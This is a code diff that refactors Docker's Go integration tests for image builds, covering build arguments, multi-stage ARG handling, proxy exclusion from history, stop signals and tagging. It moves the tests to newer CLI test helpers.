*check.C) { testRequires(c, DaemonIsLinux) // Windows does not support STOPSIGNAL yet imgName := "test_build_stop_signal" - _, err := buildImage(imgName, - `FROM busybox - STOPSIGNAL SIGKILL`, - true) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, imgName, build.WithDockerfile(`FROM busybox + STOPSIGNAL SIGKILL`)) res := inspectFieldJSON(c, imgName, "Config.StopSignal") if res != `"SIGKILL"` { c.Fatalf("Signal %s, expected SIGKILL", res) @@ -5632,7 +4081,6 @@ func (s *DockerSuite) TestBuildStopSignal(c *check.C) { containerName := "test-container-stop-signal" dockerCmd(c, "run", "-d", "--name", containerName, imgName, "top") - res = inspectFieldJSON(c, containerName, "Config.StopSignal") if res != `"SIGKILL"` { c.Fatalf("Signal %s, expected SIGKILL", res) @@ -5643,9 +4091,8 @@ func (s *DockerSuite) TestBuildBuildTimeArg(c *check.C) { imgName := "bldargtest" envKey := "foo" envVal := "bar" - args := []string{"--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)} var dockerfile string - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { // Bugs in Windows busybox port - use the default base image and native cmd stuff dockerfile = fmt.Sprintf(`FROM `+minimalBaseImage()+` ARG %s @@ -5658,13 +4105,12 @@ func (s *DockerSuite) TestBuildBuildTimeArg(c *check.C) { CMD echo $%s`, envKey, envKey, envKey) } - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envVal) - } + buildImage(imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ).Assert(c, icmd.Expected{ + Out: envVal, + }) containerName := "bldargCont" out, _ := dockerCmd(c, "run", "--name", containerName, imgName) @@ -5679,18 +4125,14 @@ func (s *DockerSuite) TestBuildBuildTimeArgHistory(c *check.C) { 
envKey := "foo" envVal := "bar" envDef := "bar1" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } dockerfile := fmt.Sprintf(`FROM busybox ARG %s=%s`, envKey, envDef) - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envVal) - } + buildImage(imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ).Assert(c, icmd.Expected{ + Out: envVal, + }) out, _ := dockerCmd(c, "history", "--no-trunc", imgName) outputTabs := strings.Split(out, "\n")[1] @@ -5699,28 +4141,66 @@ func (s *DockerSuite) TestBuildBuildTimeArgHistory(c *check.C) { } } -func (s *DockerSuite) TestBuildBuildTimeArgCacheHit(c *check.C) { +func (s *DockerSuite) TestBuildTimeArgHistoryExclusions(c *check.C) { imgName := "bldargtest" envKey := "foo" envVal := "bar" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } + proxy := "HTTP_PROXY=http://user:password@proxy.example.com" + explicitProxyKey := "http_proxy" + explicitProxyVal := "http://user:password@someproxy.example.com" dockerfile := fmt.Sprintf(`FROM busybox ARG %s - RUN echo $%s`, envKey, envKey) + ARG %s + RUN echo "Testing Build Args!"`, envKey, explicitProxyKey) - origImgID := "" - var err error - if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil { - c.Fatal(err) + buildImage := func(imgName string) string { + cli.BuildCmd(c, imgName, + cli.WithFlags("--build-arg", "https_proxy=https://proxy.example.com", + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + "--build-arg", fmt.Sprintf("%s=%s", explicitProxyKey, explicitProxyVal), + "--build-arg", proxy), + build.WithDockerfile(dockerfile), + ) + return getIDByName(c, imgName) + } + + origID := buildImage(imgName) + 
result := cli.DockerCmd(c, "history", "--no-trunc", imgName) + out := result.Stdout() + + if strings.Contains(out, proxy) { + c.Fatalf("failed to exclude proxy settings from history!") } + if strings.Contains(out, "https_proxy") { + c.Fatalf("failed to exclude proxy settings from history!") + } + result.Assert(c, icmd.Expected{Out: fmt.Sprintf("%s=%s", envKey, envVal)}) + result.Assert(c, icmd.Expected{Out: fmt.Sprintf("%s=%s", explicitProxyKey, explicitProxyVal)}) + + cacheID := buildImage(imgName + "-two") + c.Assert(origID, checker.Equals, cacheID) +} + +func (s *DockerSuite) TestBuildBuildTimeArgCacheHit(c *check.C) { + imgName := "bldargtest" + envKey := "foo" + envVal := "bar" + dockerfile := fmt.Sprintf(`FROM busybox + ARG %s + RUN echo $%s`, envKey, envKey) + buildImageSuccessfully(c, imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + origImgID := getIDByName(c, imgName) imgNameCache := "bldargtestcachehit" - if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID != origImgID { - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, imgNameCache, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + newImgID := getIDByName(c, imgName) + if newImgID != origImgID { c.Fatalf("build didn't use cache! 
expected image id: %q built image id: %q", origImgID, newImgID) } } @@ -5731,27 +4211,27 @@ func (s *DockerSuite) TestBuildBuildTimeArgCacheMissExtraArg(c *check.C) { envVal := "bar" extraEnvKey := "foo1" extraEnvVal := "bar1" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } - dockerfile := fmt.Sprintf(`FROM busybox ARG %s ARG %s RUN echo $%s`, envKey, extraEnvKey, envKey) - - origImgID := "" - var err error - if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + origImgID := getIDByName(c, imgName) imgNameCache := "bldargtestcachemiss" - args = append(args, "--build-arg", fmt.Sprintf("%s=%s", extraEnvKey, extraEnvVal)) - if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID == origImgID { - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, imgNameCache, + cli.WithFlags( + "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), + "--build-arg", fmt.Sprintf("%s=%s", extraEnvKey, extraEnvVal), + ), + build.WithDockerfile(dockerfile), + ) + newImgID := getIDByName(c, imgNameCache) + + if newImgID == origImgID { c.Fatalf("build used cache, expected a miss!") } } @@ -5761,28 +4241,22 @@ func (s *DockerSuite) TestBuildBuildTimeArgCacheMissSameArgDiffVal(c *check.C) { envKey := "foo" envVal := "bar" newEnvVal := "bar1" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } - dockerfile := fmt.Sprintf(`FROM busybox ARG %s RUN echo $%s`, envKey, envKey) - - origImgID := "" - var err error - if origImgID, err = buildImage(imgName, dockerfile, true, args...); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + origImgID := getIDByName(c, imgName) 
imgNameCache := "bldargtestcachemiss" - args = []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, newEnvVal), - } - if newImgID, err := buildImage(imgNameCache, dockerfile, true, args...); err != nil || newImgID == origImgID { - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, imgNameCache, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, newEnvVal)), + build.WithDockerfile(dockerfile), + ) + newImgID := getIDByName(c, imgNameCache) + if newImgID == origImgID { c.Fatalf("build used cache, expected a miss!") } } @@ -5792,61 +4266,58 @@ func (s *DockerSuite) TestBuildBuildTimeArgOverrideArgDefinedBeforeEnv(c *check. imgName := "bldargtest" envKey := "foo" envVal := "bar" - envValOveride := "barOverride" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } + envValOverride := "barOverride" dockerfile := fmt.Sprintf(`FROM busybox ARG %s ENV %s %s RUN echo $%s CMD echo $%s - `, envKey, envKey, envValOveride, envKey, envKey) + `, envKey, envKey, envValOverride, envKey, envKey) - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride) + result := buildImage(imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + result.Assert(c, icmd.Success) + if strings.Count(result.Combined(), envValOverride) != 2 { + c.Fatalf("failed to access environment variable in output: %q expected: %q", result.Combined(), envValOverride) } containerName := "bldargCont" - if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) { - c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride) + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); 
!strings.Contains(out, envValOverride) { + c.Fatalf("run produced invalid output: %q, expected %q", out, envValOverride) } } +// FIXME(vdemeester) might be useful to merge with the one above ? func (s *DockerSuite) TestBuildBuildTimeArgOverrideEnvDefinedBeforeArg(c *check.C) { testRequires(c, DaemonIsLinux) // Windows does not support ARG imgName := "bldargtest" envKey := "foo" envVal := "bar" - envValOveride := "barOverride" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } + envValOverride := "barOverride" dockerfile := fmt.Sprintf(`FROM busybox ENV %s %s ARG %s RUN echo $%s CMD echo $%s - `, envKey, envValOveride, envKey, envKey, envKey) - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride) + `, envKey, envValOverride, envKey, envKey, envKey) + result := buildImage(imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + result.Assert(c, icmd.Success) + if strings.Count(result.Combined(), envValOverride) != 2 { + c.Fatalf("failed to access environment variable in output: %q expected: %q", result.Combined(), envValOverride) } containerName := "bldargCont" - if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) { - c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride) + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOverride) { + c.Fatalf("run produced invalid output: %q, expected %q", out, envValOverride) } } func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) { - testRequires(c, DaemonIsLinux) // Windows does not support ARG imgName := "bldvarstest" wdVar := "WDIR" @@ -5863,16 +4334,23 
@@ func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) { userVal := "testUser" volVar := "VOL" volVal := "/testVol/" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", wdVar, wdVal), - "--build-arg", fmt.Sprintf("%s=%s", addVar, addVal), - "--build-arg", fmt.Sprintf("%s=%s", copyVar, copyVal), - "--build-arg", fmt.Sprintf("%s=%s", envVar, envVal), - "--build-arg", fmt.Sprintf("%s=%s", exposeVar, exposeVal), - "--build-arg", fmt.Sprintf("%s=%s", userVar, userVal), - "--build-arg", fmt.Sprintf("%s=%s", volVar, volVal), - } - ctx, err := fakeContext(fmt.Sprintf(`FROM busybox + if DaemonIsWindows() { + volVal = "C:\\testVol" + wdVal = "C:\\tmp" + } + + buildImageSuccessfully(c, imgName, + cli.WithFlags( + "--build-arg", fmt.Sprintf("%s=%s", wdVar, wdVal), + "--build-arg", fmt.Sprintf("%s=%s", addVar, addVal), + "--build-arg", fmt.Sprintf("%s=%s", copyVar, copyVal), + "--build-arg", fmt.Sprintf("%s=%s", envVar, envVal), + "--build-arg", fmt.Sprintf("%s=%s", exposeVar, exposeVal), + "--build-arg", fmt.Sprintf("%s=%s", userVar, userVal), + "--build-arg", fmt.Sprintf("%s=%s", volVar, volVal), + ), + build.WithBuildContext(c, + build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox ARG %s WORKDIR ${%s} ARG %s @@ -5887,30 +4365,18 @@ func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) { USER $%s ARG %s VOLUME ${%s}`, - wdVar, wdVar, addVar, addVar, copyVar, copyVar, envVar, envVar, - envVar, exposeVar, exposeVar, userVar, userVar, volVar, volVar), - map[string]string{ - addVal: "some stuff", - copyVal: "some stuff", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() + wdVar, wdVar, addVar, addVar, copyVar, copyVar, envVar, envVar, + envVar, exposeVar, exposeVar, userVar, userVar, volVar, volVar)), + build.WithFile(addVal, "some stuff"), + build.WithFile(copyVal, "some stuff"), + ), + ) - if _, err := buildImageFromContext(imgName, ctx, true, args...); err != nil { - c.Fatal(err) - } + res := inspectField(c, imgName, 
"Config.WorkingDir") + c.Check(filepath.ToSlash(res), check.Equals, filepath.ToSlash(wdVal)) - var resMap map[string]interface{} var resArr []string - res := "" - res = inspectField(c, imgName, "Config.WorkingDir") - if res != filepath.ToSlash(filepath.Clean(wdVal)) { - c.Fatalf("Config.WorkingDir value mismatch. Expected: %s, got: %s", filepath.ToSlash(filepath.Clean(wdVal)), res) - } - - inspectFieldAndMarshall(c, imgName, "Config.Env", &resArr) + inspectFieldAndUnmarshall(c, imgName, "Config.Env", &resArr) found := false for _, v := range resArr { @@ -5924,7 +4390,8 @@ func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) { envVar, envVal, resArr) } - inspectFieldAndMarshall(c, imgName, "Config.ExposedPorts", &resMap) + var resMap map[string]interface{} + inspectFieldAndUnmarshall(c, imgName, "Config.ExposedPorts", &resMap) if _, ok := resMap[fmt.Sprintf("%s/tcp", exposeVal)]; !ok { c.Fatalf("Config.ExposedPorts value mismatch. Expected exposed port: %s/tcp, got: %v", exposeVal, resMap) } @@ -5934,7 +4401,7 @@ func (s *DockerSuite) TestBuildBuildTimeArgExpansion(c *check.C) { c.Fatalf("Config.User value mismatch. Expected: %s, got: %s", userVal, res) } - inspectFieldAndMarshall(c, imgName, "Config.Volumes", &resMap) + inspectFieldAndUnmarshall(c, imgName, "Config.Volumes", &resMap) if _, ok := resMap[volVal]; !ok { c.Fatalf("Config.Volumes value mismatch. 
Expected volume: %s, got: %v", volVal, resMap) } @@ -5946,27 +4413,25 @@ func (s *DockerSuite) TestBuildBuildTimeArgExpansionOverride(c *check.C) { envKey := "foo" envVal := "bar" envKey1 := "foo1" - envValOveride := "barOverride" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } + envValOverride := "barOverride" dockerfile := fmt.Sprintf(`FROM busybox ARG %s ENV %s %s ENV %s ${%s} RUN echo $%s - CMD echo $%s`, envKey, envKey, envValOveride, envKey1, envKey, envKey1, envKey1) - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 2 { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride) + CMD echo $%s`, envKey, envKey, envValOverride, envKey1, envKey, envKey1, envKey1) + result := buildImage(imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + result.Assert(c, icmd.Success) + if strings.Count(result.Combined(), envValOverride) != 2 { + c.Fatalf("failed to access environment variable in output: %q expected: %q", result.Combined(), envValOverride) } containerName := "bldargCont" - if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) { - c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride) + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOverride) { + c.Fatalf("run produced invalid output: %q, expected %q", out, envValOverride) } } @@ -5975,19 +4440,17 @@ func (s *DockerSuite) TestBuildBuildTimeArgUntrustedDefinedAfterUse(c *check.C) imgName := "bldargtest" envKey := "foo" envVal := "bar" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } dockerfile := fmt.Sprintf(`FROM busybox RUN echo $%s ARG %s CMD echo $%s`, envKey, envKey, 
envKey) - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Contains(out, envVal) { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("able to access environment variable in output: %q expected to be missing", out) + result := buildImage(imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + result.Assert(c, icmd.Success) + if strings.Contains(result.Combined(), envVal) { + c.Fatalf("able to access environment variable in output: %q expected to be missing", result.Combined()) } containerName := "bldargCont" @@ -6001,20 +4464,18 @@ func (s *DockerSuite) TestBuildBuildTimeArgBuiltinArg(c *check.C) { imgName := "bldargtest" envKey := "HTTP_PROXY" envVal := "bar" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } dockerfile := fmt.Sprintf(`FROM busybox RUN echo $%s CMD echo $%s`, envKey, envKey) - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || !strings.Contains(out, envVal) { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envVal) + result := buildImage(imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ) + result.Assert(c, icmd.Success) + if !strings.Contains(result.Combined(), envVal) { + c.Fatalf("failed to access environment variable in output: %q expected: %q", result.Combined(), envVal) } - containerName := "bldargCont" if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); out != "\n" { c.Fatalf("run produced invalid output: %q, expected empty string", out) @@ -6026,26 +4487,24 @@ func (s *DockerSuite) TestBuildBuildTimeArgDefaultOverride(c *check.C) { imgName := "bldargtest" envKey := "foo" envVal := "bar" - envValOveride := "barOverride" - args := 
[]string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envValOveride), - } + envValOverride := "barOverride" dockerfile := fmt.Sprintf(`FROM busybox ARG %s=%s ENV %s $%s RUN echo $%s CMD echo $%s`, envKey, envVal, envKey, envKey, envKey, envKey) - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envValOveride) != 1 { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("failed to access environment variable in output: %q expected: %q", out, envValOveride) + result := buildImage(imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envValOverride)), + build.WithDockerfile(dockerfile), + ) + result.Assert(c, icmd.Success) + if strings.Count(result.Combined(), envValOverride) != 1 { + c.Fatalf("failed to access environment variable in output: %q expected: %q", result.Combined(), envValOverride) } containerName := "bldargCont" - if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOveride) { - c.Fatalf("run produced invalid output: %q, expected %q", out, envValOveride) + if out, _ := dockerCmd(c, "run", "--name", containerName, imgName); !strings.Contains(out, envValOverride) { + c.Fatalf("run produced invalid output: %q, expected %q", out, envValOverride) } } @@ -6053,46 +4512,28 @@ func (s *DockerSuite) TestBuildBuildTimeArgUnconsumedArg(c *check.C) { imgName := "bldargtest" envKey := "foo" envVal := "bar" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } dockerfile := fmt.Sprintf(`FROM busybox RUN echo $%s CMD echo $%s`, envKey, envKey) - warnStr := "[Warning] One or more build-args" - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); !strings.Contains(out, warnStr) { - c.Fatalf("build completed without warning: %q %q", out, err) - } else if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - + buildImage(imgName, + 
cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ).Assert(c, icmd.Expected{ + Out: warnStr, + }) } func (s *DockerSuite) TestBuildBuildTimeArgEnv(c *check.C) { testRequires(c, DaemonIsLinux) // Windows does not support ARG - args := []string{ - "build", - "--build-arg", fmt.Sprintf("FOO1=fromcmd"), - "--build-arg", fmt.Sprintf("FOO2="), - "--build-arg", fmt.Sprintf("FOO3"), // set in env - "--build-arg", fmt.Sprintf("FOO4"), // not set in env - "--build-arg", fmt.Sprintf("FOO5=fromcmd"), - // FOO6 is not set at all - "--build-arg", fmt.Sprintf("FOO7=fromcmd"), // should produce a warning - "--build-arg", fmt.Sprintf("FOO8="), // should produce a warning - "--build-arg", fmt.Sprintf("FOO9"), // should produce a warning - ".", - } - - dockerfile := fmt.Sprintf(`FROM busybox + dockerfile := `FROM busybox ARG FOO1=fromfile ARG FOO2=fromfile ARG FOO3=fromfile ARG FOO4=fromfile ARG FOO5 ARG FOO6 + ARG FO10 RUN env RUN [ "$FOO1" == "fromcmd" ] RUN [ "$FOO2" == "" ] @@ -6104,30 +4545,38 @@ func (s *DockerSuite) TestBuildBuildTimeArgEnv(c *check.C) { RUN [ "$(env | grep FOO7)" == "" ] RUN [ "$(env | grep FOO8)" == "" ] RUN [ "$(env | grep FOO9)" == "" ] - `) - - ctx, err := fakeContext(dockerfile, nil) - c.Assert(err, check.IsNil) - defer ctx.Close() - - cmd := exec.Command(dockerBinary, args...) 
- cmd.Dir = ctx.Dir - cmd.Env = append(os.Environ(), - "FOO1=fromenv", - "FOO2=fromenv", - "FOO3=fromenv") - out, _, err := runCommandWithOutput(cmd) - if err != nil { - c.Fatal(err, out) - } + RUN [ "$FO10" == "" ] + ` + result := buildImage("testbuildtimeargenv", + cli.WithFlags( + "--build-arg", fmt.Sprintf("FOO1=fromcmd"), + "--build-arg", fmt.Sprintf("FOO2="), + "--build-arg", fmt.Sprintf("FOO3"), // set in env + "--build-arg", fmt.Sprintf("FOO4"), // not set in env + "--build-arg", fmt.Sprintf("FOO5=fromcmd"), + // FOO6 is not set at all + "--build-arg", fmt.Sprintf("FOO7=fromcmd"), // should produce a warning + "--build-arg", fmt.Sprintf("FOO8="), // should produce a warning + "--build-arg", fmt.Sprintf("FOO9"), // should produce a warning + "--build-arg", fmt.Sprintf("FO10"), // not set in env, empty value + ), + cli.WithEnvironmentVariables(append(os.Environ(), + "FOO1=fromenv", + "FOO2=fromenv", + "FOO3=fromenv")...), + build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + ), + ) + result.Assert(c, icmd.Success) // Now check to make sure we got a warning msg about unused build-args - i := strings.Index(out, "[Warning]") + i := strings.Index(result.Combined(), "[Warning]") if i < 0 { - c.Fatalf("Missing the build-arg warning in %q", out) + c.Fatalf("Missing the build-arg warning in %q", result.Combined()) } - out = out[i:] // "out" should contain just the warning message now + out := result.Combined()[i:] // "out" should contain just the warning message now // These were specified on a --build-arg but no ARG was in the Dockerfile c.Assert(out, checker.Contains, "FOO7") @@ -6141,7 +4590,6 @@ func (s *DockerSuite) TestBuildBuildTimeArgQuotedValVariants(c *check.C) { envKey1 := "foo1" envKey2 := "foo2" envKey3 := "foo3" - args := []string{} dockerfile := fmt.Sprintf(`FROM busybox ARG %s="" ARG %s='' @@ -6154,10 +4602,7 @@ func (s *DockerSuite) TestBuildBuildTimeArgQuotedValVariants(c *check.C) { RUN [ "$%s" != "$%s" ]`, envKey, envKey1, 
envKey2, envKey3, envKey, envKey2, envKey, envKey3, envKey1, envKey2, envKey1, envKey3, envKey2, envKey3) - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } + buildImageSuccessfully(c, imgName, build.WithDockerfile(dockerfile)) } func (s *DockerSuite) TestBuildBuildTimeArgEmptyValVariants(c *check.C) { @@ -6166,7 +4611,6 @@ func (s *DockerSuite) TestBuildBuildTimeArgEmptyValVariants(c *check.C) { envKey := "foo" envKey1 := "foo1" envKey2 := "foo2" - args := []string{} dockerfile := fmt.Sprintf(`FROM busybox ARG %s= ARG %s="" @@ -6174,32 +4618,96 @@ func (s *DockerSuite) TestBuildBuildTimeArgEmptyValVariants(c *check.C) { RUN [ "$%s" == "$%s" ] RUN [ "$%s" == "$%s" ] RUN [ "$%s" == "$%s" ]`, envKey, envKey1, envKey2, envKey, envKey1, envKey1, envKey2, envKey, envKey2) - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } + buildImageSuccessfully(c, imgName, build.WithDockerfile(dockerfile)) } -func (s *DockerSuite) TestBuildBuildTimeArgDefintionWithNoEnvInjection(c *check.C) { +func (s *DockerSuite) TestBuildBuildTimeArgDefinitionWithNoEnvInjection(c *check.C) { imgName := "bldargtest" envKey := "foo" - args := []string{} dockerfile := fmt.Sprintf(`FROM busybox ARG %s RUN env`, envKey) - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envKey) != 1 { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("unexpected number of occurrences of the arg in output: %q expected: 1", out) + result := cli.BuildCmd(c, imgName, build.WithDockerfile(dockerfile)) + result.Assert(c, icmd.Success) + if strings.Count(result.Combined(), envKey) != 1 { + c.Fatalf("unexpected number of occurrences of the arg in output: %q expected: 1", result.Combined()) } } +func (s *DockerSuite) 
TestBuildMultiStageArg(c *check.C) { + imgName := "multifrombldargtest" + dockerfile := `FROM busybox + ARG foo=abc + LABEL multifromtest=1 + RUN env > /out + FROM busybox + ARG bar=def + RUN env > /out` + + result := cli.BuildCmd(c, imgName, build.WithDockerfile(dockerfile)) + result.Assert(c, icmd.Success) + + result = cli.DockerCmd(c, "images", "-q", "-f", "label=multifromtest=1") + parentID := strings.TrimSpace(result.Stdout()) + + result = cli.DockerCmd(c, "run", "--rm", parentID, "cat", "/out") + c.Assert(result.Stdout(), checker.Contains, "foo=abc") + + result = cli.DockerCmd(c, "run", "--rm", imgName, "cat", "/out") + c.Assert(result.Stdout(), checker.Not(checker.Contains), "foo") + c.Assert(result.Stdout(), checker.Contains, "bar=def") +} + +func (s *DockerSuite) TestBuildMultiStageGlobalArg(c *check.C) { + imgName := "multifrombldargtest" + dockerfile := `ARG tag=nosuchtag + FROM busybox:${tag} + LABEL multifromtest=1 + RUN env > /out + FROM busybox:${tag} + ARG tag + RUN env > /out` + + result := cli.BuildCmd(c, imgName, + build.WithDockerfile(dockerfile), + cli.WithFlags("--build-arg", fmt.Sprintf("tag=latest"))) + result.Assert(c, icmd.Success) + + result = cli.DockerCmd(c, "images", "-q", "-f", "label=multifromtest=1") + parentID := strings.TrimSpace(result.Stdout()) + + result = cli.DockerCmd(c, "run", "--rm", parentID, "cat", "/out") + c.Assert(result.Stdout(), checker.Not(checker.Contains), "tag") + + result = cli.DockerCmd(c, "run", "--rm", imgName, "cat", "/out") + c.Assert(result.Stdout(), checker.Contains, "tag=latest") +} + +func (s *DockerSuite) TestBuildMultiStageUnusedArg(c *check.C) { + imgName := "multifromunusedarg" + dockerfile := `FROM busybox + ARG foo + FROM busybox + ARG bar + RUN env > /out` + + result := cli.BuildCmd(c, imgName, + build.WithDockerfile(dockerfile), + cli.WithFlags("--build-arg", fmt.Sprintf("baz=abc"))) + result.Assert(c, icmd.Success) + c.Assert(result.Combined(), checker.Contains, "[Warning]") + 
c.Assert(result.Combined(), checker.Contains, "[baz] were not consumed") + + result = cli.DockerCmd(c, "run", "--rm", imgName, "cat", "/out") + c.Assert(result.Stdout(), checker.Not(checker.Contains), "bar") + c.Assert(result.Stdout(), checker.Not(checker.Contains), "baz") +} + func (s *DockerSuite) TestBuildNoNamedVolume(c *check.C) { volName := "testname:/foo" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { volName = "testname:C:\\foo" } dockerCmd(c, "run", "-v", volName, "busybox", "sh", "-c", "touch /foo/oops") @@ -6208,8 +4716,9 @@ func (s *DockerSuite) TestBuildNoNamedVolume(c *check.C) { VOLUME ` + volName + ` RUN ls /foo/oops ` - _, err := buildImage("test", dockerFile, false) - c.Assert(err, check.NotNil, check.Commentf("image build should have failed")) + buildImage("test", build.WithDockerfile(dockerFile)).Assert(c, icmd.Expected{ + ExitCode: 1, + }) } func (s *DockerSuite) TestBuildTagEvent(c *check.C) { @@ -6218,8 +4727,7 @@ func (s *DockerSuite) TestBuildTagEvent(c *check.C) { dockerFile := `FROM busybox RUN echo events ` - _, err := buildImage("test", dockerFile, false) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, "test", build.WithDockerfile(dockerFile)) until := daemonUnixTime(c) out, _ := dockerCmd(c, "events", "--since", since, "--until", until, "--filter", "type=image") @@ -6242,111 +4750,99 @@ func (s *DockerSuite) TestBuildMultipleTags(c *check.C) { FROM busybox MAINTAINER test-15780 ` - cmd := exec.Command(dockerBinary, "build", "-t", "tag1", "-t", "tag2:v2", - "-t", "tag1:latest", "-t", "tag1", "--no-cache", "-") - cmd.Stdin = strings.NewReader(dockerfile) - _, err := runCommand(cmd) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, "tag1", cli.WithFlags("-t", "tag2:v2", "-t", "tag1:latest", "-t", "tag1"), build.WithDockerfile(dockerfile)) - id1, err := getIDByName("tag1") - c.Assert(err, check.IsNil) - id2, err := getIDByName("tag2:v2") - c.Assert(err, check.IsNil) + id1 := getIDByName(c, "tag1") + 
